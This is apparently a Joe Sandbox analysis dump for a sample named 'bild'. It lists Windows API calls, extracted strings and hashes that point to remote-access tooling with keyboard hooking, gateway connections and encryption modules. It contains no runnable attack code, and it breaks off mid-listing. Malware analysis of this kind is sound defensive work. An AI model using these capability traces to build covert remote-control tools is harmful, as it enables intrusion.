                                                                                      • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                      • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                      • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                      • _memset.LIBCMT ref: 111415F9
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                      • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                      • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                      • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                      • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                      • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                      • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                      • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                        • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,A1BC2D8B,1102FCB2,00000000), ref: 1101747E
                                                                                        • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                        • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                        • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                        • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                        • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                      • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                      • API String ID: 3706574701-3145203681
                                                                                      • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                      • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C61B898,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D63E8
                                                                                      • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C5D63FA
                                                                                      • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6412
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D643B
                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6450
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D646F
                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6484
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D64A3
                                                                                      • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64C5
                                                                                      • shutdown.WSOCK32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64E9
                                                                                      • GetLastError.KERNEL32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64F2
                                                                                      • timeGetTime.WINMM(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6510
                                                                                      • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6526
                                                                                      • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6533
                                                                                      • timeGetTime.WINMM(?,00000000,?,6C5DD77B,00000000), ref: 6C5D6540
                                                                                      • Sleep.KERNEL32(00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D654B
                                                                                      • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6563
                                                                                      • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6574
                                                                                      • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D657D
                                                                                      • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D658E
                                                                                      • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D659E
                                                                                      • _memset.LIBCMT ref: 6C5D65C8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,6C5DD77B,00000000), ref: 6C5D65D7
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898,?,00000000,?,6C5DD77B,00000000), ref: 6C5D65F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                      • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                      • API String ID: 3764039262-2631155478
                                                                                      • Opcode ID: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
                                                                                      • Instruction ID: d350ec50ab228f9414e152a4c03de73e372ac209e7368118c740cc8463c9be9d
                                                                                      • Opcode Fuzzy Hash: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
                                                                                      • Instruction Fuzzy Hash: 8F51BF71644300EFDB10EF6DCCC5B5A73B8AB89316F120915E906D7A81DB70E986CF69

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                      • API String ID: 909875538-2848211065
                                                                                      • Opcode ID: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
                                                                                      • Instruction ID: dba97fcb907ed3845e0f623ca9bd7ef6d1fef07121cf68773d2a8783451612ab
                                                                                      • Opcode Fuzzy Hash: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
                                                                                      • Instruction Fuzzy Hash: B7D12271A053199FDB20CF6CCCA1BD9B774AF4A308F0641D9D8099BA41DB31AD89CF89

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FBE1370,?,0000001A), ref: 110286DD
                                                                                      • _strrchr.LIBCMT ref: 110286EC
                                                                                        • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileModuleName__stricmp_l_strrchr
                                                                                      • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                      • API String ID: 1609618855-357498123
                                                                                      • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                      • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                      • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                      • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6BD5
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6C26
                                                                                      • Sleep.KERNEL32(00000064), ref: 6C5E6C5B
                                                                                        • Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                      • WaitForSingleObject.KERNEL32(0000031C,?), ref: 6C5E6C7C
                                                                                      • _memmove.LIBCMT ref: 6C5E6C93
                                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C5E6CB4
                                                                                      • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C5E6CD9
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6CEC
                                                                                      • _calloc.LIBCMT ref: 6C5E6D76
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6DF3
                                                                                      • InterlockedExchange.KERNEL32(02853072,00000000), ref: 6C5E6E01
                                                                                      • _calloc.LIBCMT ref: 6C5E6E33
                                                                                      • _memmove.LIBCMT ref: 6C5E6E47
                                                                                      • InterlockedDecrement.KERNEL32(0285301A), ref: 6C5E6EC3
                                                                                      • SetEvent.KERNEL32(00000318), ref: 6C5E6ECF
                                                                                      • _memmove.LIBCMT ref: 6C5E6EF4
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6F4F
                                                                                      • InterlockedExchange.KERNEL32(02852FBA,-6C61A188), ref: 6C5E6F60
                                                                                      Strings
                                                                                      • ReadMessage returned FALSE. Terminating connection, xrefs: 6C5E6F3A
                                                                                      • FALSE, xrefs: 6C5E6E67
                                                                                      • ResumeTimeout, xrefs: 6C5E6BBA
                                                                                      • ProcessMessage returned FALSE. Terminating connection, xrefs: 6C5E6F25
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5E6E62
                                                                                      • httprecv, xrefs: 6C5E6BDD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                      • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                      • API String ID: 1449423504-919941520
                                                                                      • Opcode ID: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
                                                                                      • Instruction ID: adf0c25f8261296612d28c6f0cec855ec173c374a3f15780385c7ff393ddaeb6
                                                                                      • Opcode Fuzzy Hash: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
                                                                                      • Instruction Fuzzy Hash: F9B1C1B1D00258DFDF20DB69CD85BDA73B4EB4834AF00449AE649E7A40DBB49AC4CF95
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                      • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                      • API String ID: 2201880244-3035937465
                                                                                      • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                      • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                      • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                      • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 3535843008-2062829784
                                                                                      • Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                      • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                      • Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                      • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                      • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                      • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                      • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                      • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                      • _strncpy.LIBCMT ref: 11074B68
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                      • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                      • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                      • std::exception::exception.LIBCMT ref: 11074D68
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                      • API String ID: 703120326-1497550179
                                                                                      • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                      • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                      • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                      • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                        • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                        • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                        • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                        • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                      • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                        • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                        • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
